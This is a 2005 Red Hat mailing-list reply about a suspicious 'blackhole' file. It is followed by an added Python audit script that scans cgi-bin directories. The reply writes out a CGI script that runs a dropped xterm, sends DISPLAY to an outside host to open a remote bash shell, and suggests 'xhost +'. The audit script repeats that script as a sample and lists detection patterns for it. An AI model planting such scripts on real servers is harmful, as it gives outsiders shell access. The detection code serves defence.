Blackhole

Tobias Speckbacher TSpeckbacher at quova.com
Mon Apr 11 19:16:13 UTC 2005



> -----Original Message-----
> From: redhat-list-bounces at redhat.com [mailto:redhat-list-
> bounces at redhat.com] On Behalf Of Chris Kenward
> Sent: Monday, April 11, 2005 8:15 AM
> To: 'General Red Hat Linux discussion list'
> Subject: RE: Blackhole
> 
> Hi there, Tom
> 
> > Is it possible that you have some shell accounts on your system
> > and that one of your users is trying to run this?  The C code by
> > itself won't harm anything, and from what you say, it does not
> > appear to have been compiled.  Perhaps just upgrading to the newest
> > apache will fix?  Looking at the links provided below seem to
> > indicate that the executable must be run, to try to break the apache
> > server through the listed port.  I've seen this attempt many times
> > on my machine, & AFAIK, it's never been successful.
> 
> I don't think anyone local to the machine would do something like that -
> we only allow FTP access to the server and no users have telnet or SSH
> access.

Shell access is not necessary; the web server itself can essentially
serve as a shell.  It is easy enough to write a CGI script to execute all
the commands necessary.

Hell, even getting a shell is trivial:

First we grab an xterm binary from a compatible system, and drop it
wherever we have access to, set permissions yada yada yada.  Unless of
course the admin was kind enough to install it for us, which I have seen
plenty of times.

We will name the following script xterm.cgi, or whatever extension you
have set to execute, and drop it into my web site's cgi-bin directory.
Of course this will not work if the web server is properly firewalled,
which in my experience they hardly ever are.

#!/bin/bash

export DISPLAY=xxx.xxx.xxx.xxx:0.0
/tmp/xterm -e /bin/bash

If you try this, don't forget to add the host to your X server's ACL or
simply run xhost +.

A web server will let you just about do anything you want ...

-Tobias


> 
> The Apache web server is latest version from the RHN (2.0?)
> 
> I've taken the bull by the proverbials and deleted the file called
> "blackhole". Can't find anything else suspicious and looking through the
> various ports that are active doesn't really show anything suspicious.
> 
> Whew?
> 
> Regards
> Chris
> 
> 
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list
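A defender-side check for the point Tobias makes above (a CGI script in cgi-bin that runs a binary dropped in /tmp and pushes an X client to an outside host): a small audit that walks a cgi-bin directory and flags scripts showing those traits. This is an added example, not code from the original thread or from Red Hat; the indicator patterns, the function names and the two sample script bodies are this example's own constructed assumptions, and the address 192.0.2.10 is a documentation-range placeholder.

```python
import os
import re
from dataclasses import dataclass

# Indicators of a CGI script behaving like the xterm.cgi described in the
# thread.  These patterns are this example's own assumptions, not from the
# original post; tune them to the environment being audited.
INDICATORS = [
    # a program executed from a world-writable scratch directory
    ("exec-from-tmp", re.compile(r"^\s*/(?:tmp|var/tmp|dev/shm)/\S+")),
    # a DISPLAY pointed at some host, i.e. an X client about to connect out
    ("display-export", re.compile(r"^\s*(?:export\s+)?DISPLAY=\S+")),
    # an X terminal emulator invoked from a CGI script
    ("x11-client", re.compile(r"\b(?:xterm|rxvt)\b")),
    # the terminal handed an interactive shell to run
    ("interactive-shell", re.compile(r"-e\s+/bin/(?:ba)?sh\b")),
]


@dataclass
class Finding:
    path: str
    indicator: str
    line_no: int
    line: str


def audit_cgi_text(path, text):
    """Return one Finding per (line, indicator) hit in a script's contents."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                findings.append(Finding(path, name, no, line.strip()))
    return findings


def audit_cgi_dir(root):
    """Walk a cgi-bin tree and audit every readable file in it."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable entries are skipped, not fatal
            findings.extend(audit_cgi_text(path, text))
    return findings


# Constructed sample inputs: the first mirrors the script from the thread,
# the second is an ordinary CGI that should produce no findings.
SAMPLE_SUSPECT = """#!/bin/bash
export DISPLAY=192.0.2.10:0.0
/tmp/xterm -e /bin/bash
"""

SAMPLE_BENIGN = """#!/bin/bash
echo "Content-type: text/plain"
echo
date
"""

if __name__ == "__main__":
    for f in audit_cgi_text("cgi-bin/xterm.cgi", SAMPLE_SUSPECT):
        print(f"{f.path}:{f.line_no}: {f.indicator}: {f.line}")
    print("benign findings:", audit_cgi_text("cgi-bin/date.cgi", SAMPLE_BENIGN))
```

Run it as `python audit_cgi.py` to see the four hits on the sample, or call `audit_cgi_dir("/var/www/cgi-bin")` from a cron job and alert on a non-empty result. The script-content check is deliberately a complement to, not a substitute for, the egress firewalling Tobias mentions: with outbound connections from the web server blocked, the DISPLAY redirection has nowhere to go even if such a script is never spotted.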